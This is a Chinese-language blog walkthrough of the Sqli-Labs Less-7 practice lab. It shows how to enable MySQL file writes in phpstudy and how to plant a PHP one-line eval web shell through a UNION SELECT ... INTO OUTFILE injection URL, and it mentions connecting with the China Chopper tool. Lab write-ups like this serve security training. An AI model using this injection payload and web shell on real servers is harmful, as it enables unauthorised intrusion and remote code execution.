zoukankan      html  css  js  c++  java
  • Sqli-Labs less-7

    less-7

    前置基础知识:

    1. 因为我们用的是phpstudy,所以存在一个文件读写权限问题,我们需要修改一下

    首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:phpstudyPHPTutorialMySQLmy.ini文件,在其中加上一句:secure_file_priv=“/”。

     

     之后重启PHP study,然后发现已经发现发生了改变,说明修改成功,就可以进行读写了。

     第二个知识就是一句话木马

    一句话木马有多个版本的,asp php的

    这里我们只用到php版本的一句话木马:

    <?php @eval($_POST[“crow”]);?> 其中crow是密码

    一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

    以及第三个知识,用到的两个函数:load_file()  读取本地文件  into outfile 写文件    可以百度函数用法,提示路径需要用双斜线

    我们看到提示使用函数outfile,并且可以确定存在注入漏洞

     

    之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件

    http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\phpstudy\PHPTutorial\WWW\sqli-labs\Less-7\test.php" --+

     

     这里注意一句话木马里面的引号里面的就是密码,我们用中国菜刀进行连接:

     我们可以看到i,已经成功连接,可以进行文件管理

    其实,用中国菜刀比较简单,我们当然也可以把注入的内容回显的数据用outfile输出到文件中,步骤和前几关就类似了。

  • 相关阅读:
    react路由组件&&非路由组件
    react函数式组件(非路由组件)实现路由跳转
    react使用antd组件递归实现左侧菜单导航树
    【LeetCode】65. Valid Number
    【LeetCode】66. Plus One (2 solutions)
    【LeetCode】68. Text Justification
    【LeetCode】69. Sqrt(x) (2 solutions)
    【LeetCode】72. Edit Distance
    【LeetCode】73. Set Matrix Zeroes (2 solutions)
    【LeetCode】76. Minimum Window Substring
  • 原文地址:https://www.cnblogs.com/hzk001/p/12217516.html
Copyright © 2011-2022 走看看